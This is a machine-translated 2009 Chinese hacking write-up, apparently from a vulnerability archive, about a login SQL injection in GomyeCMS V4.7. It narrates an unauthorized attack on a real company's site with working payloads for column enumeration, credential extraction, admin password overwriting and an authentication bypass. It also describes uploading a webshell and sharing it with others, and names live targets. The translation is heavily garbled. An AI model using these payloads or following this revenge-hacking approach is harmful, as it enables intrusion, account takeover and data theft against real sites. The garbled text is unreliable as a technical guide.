GomyeCMS V4. 7 universal login vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62200925076
Type myhack58
Reporter 佚名
Modified 2009-10-20T00:00:00


Author:Zake 2009/10/18

Long time no write technical articles, momentary excitement JJ cocked, so wrote the following article!

The author of the program the company website at<http://www.gomye.net/>

Preface: Yours truly learning the SQL language is not very long, and if there are what statement to write the wrong heroes have to forgive me. Things in Chengdu there is a crook company, we can go to Baidu or Google keyword"Liao mind Bang Bang chicken"and then flip a few pages Can see this company a lot of news, trick my cousin to join fee. So you want to go to their company website, do a Medical domain iswww.liaoji.com, open the website, all is shtml or asp, it is contemplated to shtml may be used aspx program to generate specific what are the program is also unclear, just around the next, find a message Board, by the way it is Go shout and try I use javascript to try Cross Station, the result is surprising, discovery program the filter says is illegal Statement tips for aspx, Oh such a little fuck head. net. although is a strongly typed language but also a lot of ills, but Found a strange directory called GCMS what also don't say to access this directory, go to the backend login screen, See the following is/GCMS/logno. aspx, program name GomyeCMS V4. 7 What Is this program? Haven't seen, Baidu Google didn't result in almost is the confiscation of a record, now what? No injection the background is also not the landing of the injection(had my own SB no in-depth Test only), on a side note, but found that the entire server several Station all is this app? Finally in Next to the main station to find a this program masters, the results of the manual testing problems, and finally find it the app has a malady(also I asked my brother he told me of)this malady is in his live links such as TID=1 2 where the injection time Then I'll TID=1 2)to the front of the Merge and then to inject, to engage to engage to go also don't get what use out of this I'm anxious, or the use of its message Board to find his background, in the background of the landing hold to a Fluke of the heart test under the login injection Day is not ecstasy! The background can be injected also significant wrong, look at the version number of the implementation 'or @@version=1--The SQL version is 2 0 0 5 Here I want to point out is the login box and search box injection is a character-type so to add a single quote to merge in front of Single quotes, because some time ago to see a friend in his blog issued an article MSSQL injection will put the question that confuses Lead to a lot of friends during the injection of the time tend to put a digital type injection as the character type to injection, the character-type is not required to fit And so we do not need to add single quotes, look at the version number, I was thinking that since we are in the background of the landing here Then his program sure is to read the management table, we unnecessary the trouble Yes go find the description of the catalog backup, advanced backend to Look, the background can get a shell there is no need to go to the trouble of looking for the catalog backup. Everyone say about it! Good a no nonsense start to work Implementation statement 1'having 1=1--Get the information“the SELECT list in the column 'Content_Master. Master_ID' is invalid, Because the column is not contained in an aggregate function or the GROUP BY clause.” Everyone can see the"Content_Master. Master_ID" having what is the meaning of I do not say so detailed, you go to Baidu or Google will know, here we see Two things the front is Management table Content_Master, behind that is the ID, then we continue! Perform Statement 1'group by Master_ID having 1=1--then broke the second field Master_UserName this When we then continue to burst, burst to the We want the field and then to the explosion of data, execute the statement 1'group by Master_ID,Master_UserName having 1=1-- So in turn broke stuff until we want, the final results show Master_UserName, And Master_Password These two fields are what I want, then also nonsense? Direct proof he's Ah Daisy! Oh, that Dry on dry, 1'or(select top 1 Master_UserName+'|'+Master_Password from Content_Master)>0-- The implementation of this statement, to facilitate novice learning I by speaking this statement means that the master is gone, I dedicate ugly. or AND and is a mean character role, connected to the rear of the injection of the statement select is to query the top 1 is the top of the first strip Master_UserName+'|'+Master_Password don't have me explain it, is fields as far as the middle of the'|'This is A delimited identifier is the account number and password with|separately, we see clearly, without confusion from from Content_Master This table, we can see the results, the password for decryption is not open? Hey, I didn't have so much time and his nonsense Directly update Content_Master SET Master_Password='here is a simple MD5 1 6-bit encrypted password' where Master_UserName='admin' This statement is to modify the admin password is what we want the password value, the modification is finished and then read out the password, right to modify Here, very excited to get to go to the landing, this time found paralysis the correct password to log in, I thought this account was banned Yet, this time? Is there another account? No, I have to get a test huh! 1'or(select top 1 Master_UserName+'|'+Master_Password from Content_Master where Master_UserName not in('admin'))>0-- Behind me with a conditional expression, is the account not the admin account, see if there are other accounts did not, the result returns an empty Now depressed, forget about the first cigarette, the preparation is carried out under heavy read directory, if I can update then the permissions will not The effect of DB, and tap the finished smoke to continue to play, the first step to see what permissions, at least the heart has a bottom, a lot of people invasion Not like me, and to this point only to see what permissions huh! The first step I'll test the following is not a DB permissions Perform 1'or (Select IS_MEMBER('db_owner'))=1-- days. to. which the gods wrote the program! Actually this statement can be directly into backend! Password places are not required to enter! my god now the programmer! I F the In fact, I smoked a cigarette go to the WC hit the ash machine! May be I put the whammy to the incident is over, so good luck came, to go in the background You do not want the Caesar! Find an upload directly to a aspx the horse run up, the Server Permissions great! Can't jump Find a target to take home to him, and lied to 2 0 million still have to be black he 2 0, and finally the shell throw me those brothers, Let them go help me scold! Here I want to particularly appreciate the two talents the first bit of the Ghost boy the second folding feather bird & bird good man. Cursing the language of great taste, I see a heart that cool Ah! Will not say, the silver God in the rhythm and Oh are scolded good! Liar. Paralysis of the as to scold you! This article says was to write a vulnerability, in fact I'm talking to myself a great article. Finally, I also want to mention a person 2 month 3 0 day I this brother is very good, in the SQL language has helped me many times!

Final summary: Test the official station of the <http://www.gomye.net/a.asp>

1'or (Select IS_MEMBER('db_owner'))=1-- This statement is this app universal login account The password everywhere without the need to input, the author of the program the company website at<http://www.gomye.net/>I in his Station found on the Their few success stories, the test result is 1 0 0%marked up! The end of the presentation Thank you for viewing!